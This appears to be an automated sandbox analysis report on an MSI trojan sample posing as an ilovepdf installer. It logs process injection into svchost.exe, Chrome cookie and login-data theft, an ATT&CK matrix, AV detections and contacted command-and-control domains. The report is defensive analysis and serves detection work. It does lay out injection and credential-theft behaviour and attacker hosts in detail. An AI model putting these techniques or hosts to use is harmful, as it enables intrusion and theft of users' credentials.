Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 1A370000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: C5B40000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: CAA60000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 215B0000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 519A0000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 6B180000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 3A260000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 1A940000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 12130000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 5BFA0000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 22B30000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: B2180000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: BA0B0000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 96320000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 3F100000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: 8E740000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: unknown EIP: CCE40000
Writes to foreign memory regionsShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 24B7C9A0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 204F32C0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 23341FB0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1D91A370000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2F2C5B40000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 222CAA60000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 286215B0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DC519A0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2216B180000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2743A260000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1111A940000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 22F12130000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE5BFA0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 21C22B30000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 202B2180000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFBA0B0000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 25C96320000
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Windows\System32\svchost.exeThread register set: target process: 6944
Contains functionality to inject threads in other processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EBC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339BC10 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Sets debug register (to hijack the execution of another thread)Show sources
Source: C:\Windows\System32\svchost.exeThread register set: 6944 4D000
Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,FindCloseChangeNotification,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,FindCloseChangeNotification,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService
Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService
Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k SystemNetworkService
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC2050 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006A4AF0 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC2050 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C6A5C AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_005C78B8 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Progman
Source: svchost.exe, 00000010.00000002.826427875.0000012E17C80000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: GetLocaleInfoW,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: GetLocaleInfoW,
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpQueries volume information: C:\ VolumeInformation
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00405AE0 cpuid
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041C3D8 GetLocalTime,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198DEC74 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_00625580 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,
Source: svchost.exe, 00000026.00000000.409083058.0000025C96554000.00000004.00000001.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe

Stealing of Sensitive Information:

barindex
Yara detected Cookie StealerShow sources
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.tmp
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Contains functionality to steal Chrome passwords or cookiesShow sources
Source: C:\Windows\System32\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

barindex
Yara detected Cookie StealerShow sources
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 16.2.svchost.exe.12e19820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000010.00000003.414330253.0000012E1A130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6944, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ECD7B0 htons,bind,bind,InterlockedIncrement,InterlockedIncrement,InterlockedIncrement,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED2030 socket,bind,closesocket,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED39E0 WSAGetLastError,socket,WSAGetLastError,WSAIoctl,WSAGetLastError,htons,bind,WSAGetLastError,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0F0B90 htons,bind,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17896260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17898000 WSAGetLastError,socket,htons,bind,WSAGetLastError,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17890B90 htons,bind,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A0B90 htons,bind,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A6260 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A8000 WSAGetLastError,socket,htons,bind,WSAGetLastError,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Native API1DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools1OS Credential Dumping2System Time Discovery2Replication Through Removable Media1Archive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Replication Through Removable Media1Service Execution12Create Account1DLL Side-Loading1Deobfuscate/Decode Files or Information1Input Capture11Peripheral Device Discovery11Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Valid Accounts1Valid Accounts1Obfuscated Files or Information21Credentials In Files1System Service Discovery1SMB/Windows Admin SharesInput Capture11Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Windows Service11Access Token Manipulation11Software Packing21NTDSFile and Directory Discovery3Distributed Component Object ModelClipboard Data2Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronRegistry Run Keys / Startup Folder1Windows Service11DLL Side-Loading1LSA SecretsSystem Information Discovery47SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdBootkit1Process Injection823File Deletion1Cached Domain CredentialsQuery Registry1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Masquerading122DCSyncSecurity Software Discovery471Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts1Proc FilesystemVirtualization/Sandbox Evasion131Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Modify Registry1/etc/passwd and /etc/shadowProcess Discovery3Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Virtualization/Sandbox Evasion131Network SniffingApplication Window Discovery11Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronAccess Token Manipulation11Input CaptureSystem Owner/User Discovery2Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection823KeyloggingRemote System Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskBootkit1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
Trusted RelationshipPythonHypervisorProcess InjectionRundll321Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement
Hardware AdditionsJavaScript/JScriptValid AccountsDynamic-link Library InjectionIndicator Removal on Host1Credential API HookingSystem Information DiscoveryExploit Enterprise ResourcesRemote Email CollectionAlternate Network MediumsExternal ProxyExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 508222 Sample: 6rfyiAq0nM Startdate: 24/10/2021 Architecture: WINDOWS Score: 74 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Multi AV Scanner detection for domain / URL 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 3 other signatures 2->67 10 msiexec.exe 7 27 2->10         started        14 msiexec.exe 2 2->14         started        process3 file4 53 C:\Windows\Installer\MSIFBC3.tmp, PE32 10->53 dropped 89 Drops executables to the windows directory (C:\Windows) and starts them 10->89 16 MSIFBC3.tmp 2 10->16         started        signatures5 process6 file7 39 C:\Users\user\AppData\Local\...\MSIFBC3.tmp, PE32 16->39 dropped 19 MSIFBC3.tmp 25 32 16->19         started        process8 file9 41 C:\Program Files (x86)\...\is-VR0CA.tmp, PE32 19->41 dropped 43 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->43 dropped 45 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 19->45 dropped 47 13 other files (none is malicious) 19->47 dropped 22 rundll32.exe 3 19->22         started        process10 signatures11 73 Contains functionality to infect the boot sector 22->73 75 Contains functionality to inject threads in other processes 22->75 77 Contains functionality to inject code into remote processes 22->77 79 5 other signatures 22->79 25 svchost.exe 1 22->25 injected 28 svchost.exe 22->28 injected 30 svchost.exe 22->30 injected 32 14 other processes 22->32 process12 signatures13 81 System process connects to network (likely due to code injection or exploit) 25->81 83 Contains functionality to infect the boot sector 25->83 85 Contains functionality to inject threads in other processes 25->85 87 5 other signatures 25->87 34 svchost.exe 6 14 25->34         started        process14 dnsIp15 55 toa.mygametoa.com 34.64.183.91 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 34->55 57 208.95.112.1 TUT-ASUS United States 34->57 59 3 other IPs or domains 34->59 49 C:\Users\user\AppData\...\Login Data.tmp, SQLite 34->49 dropped 51 C:\Users\user\AppData\Local\...\Cookies.tmp, SQLite 34->51 dropped 69 Query firmware table information (likely to detect VMs) 34->69 71 Tries to harvest and steal browser information (history, passwords, etc) 34->71 file16 signatures17

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
6rfyiAq0nM.msi31%VirustotalBrowse
6rfyiAq0nM.msi8%MetadefenderBrowse
6rfyiAq0nM.msi36%ReversingLabsWin32.Trojan.Waldek

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)0%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-30MA7.tmp4%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp5%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-93C0J.tmp4%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp0%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp0%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp4%ReversingLabs
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp9%MetadefenderBrowse
C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp26%ReversingLabsWin32.Trojan.Generic

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
13.2.rundll32.exe.4eb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
37.2.svchost.exe.1afba170000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
20.2.svchost.exe.1d91aad0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
28.0.svchost.exe.1111ac00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
24.0.svchost.exe.1dc51fb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
28.2.svchost.exe.1111ac00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
24.2.svchost.exe.1dc51fb0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
37.0.svchost.exe.1afba170000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
30.2.svchost.exe.1be5cd40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
17.0.svchost.exe.204f3380000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
27.2.svchost.exe.2743a320000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
34.2.svchost.exe.202b28f0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
16.2.svchost.exe.12e17870000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
34.0.svchost.exe.202b28f0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
19.2.svchost.exe.233426d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
23.2.svchost.exe.28621cd0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
29.0.svchost.exe.22f12740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
29.2.svchost.exe.22f12740000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
31.2.svchost.exe.21c23140000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
23.0.svchost.exe.28621cd0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
27.0.svchost.exe.2743a320000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
31.0.svchost.exe.21c23140000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
17.2.svchost.exe.204f3380000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
21.0.svchost.exe.2f2c5c00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
38.0.svchost.exe.25c96c80000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
25.2.svchost.exe.2216b8b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
30.0.svchost.exe.1be5cd40000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
22.0.svchost.exe.222cab20000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
22.2.svchost.exe.222cab20000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
14.2.svchost.exe.24b7d0d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
19.0.svchost.exe.233426d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
21.2.svchost.exe.2f2c5c00000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
38.2.svchost.exe.25c96c80000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
25.0.svchost.exe.2216b8b0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
14.0.svchost.exe.24b7d0d0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File
20.0.svchost.exe.1d91aad0000.0.unpack100%AviraTR/ATRAPS.Gen2Download File

Domains

SourceDetectionScannerLabelLink
toa.mygametoa.com0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https:///xboxlive.com0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurl0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://fg.mygameagend.com/report7.4.php6%VirustotalBrowse
https://fg.mygameagend.com/report7.4.php0%Avira URL Cloudsafe
https://bh.mygameadmin.com/0%Avira URL Cloudsafe
https:///live.com0%Avira URL Cloudsafe
https://fg.mygameagend.com/0%Avira URL Cloudsafe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
https://www.remobjects.com/ps0%URL Reputationsafe
http://subca.ocsp-certum.com010%URL Reputationsafe
https://www.innosetup.com/0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://jrsoftware.org00%Avira URL Cloudsafe
https://bh.mygameadmin.com/report7.4.phpile0%Avira URL Cloudsafe
https://login.windows.netll0%Avira URL Cloudsafe
https://login.windows.netm0%Avira URL Cloudsafe
https://pcbmhome.com/click.php?cnv_id=%s&cl=%d0%Avira URL Cloudsafe
https://login.windows.netB7E5B0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://w.ijg.0%Avira URL Cloudsafe
https://bh.mygameadmin.com/report7.4.php0%Avira URL Cloudsafe
https://p-api.com/json/?fields=81980%Avira URL Cloudsafe
http://cscasha2.ocsp-certum.com040%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
https:///windows.net0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
https://fg.mygameagend.com/dll0%Avira URL Cloudsafe
https://xsts.auth.xboxlive.com20%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
toa.mygametoa.com
34.64.183.91
truetrueunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://fg.mygameagend.com/report7.4.phptrue
  • 6%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bh.mygameadmin.com/report7.4.phpfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUMSIFBC3.tmp, 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, 6rfyiAq0nM.msifalse
    		high
    https://login.windows.netsvchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpfalse
      		high
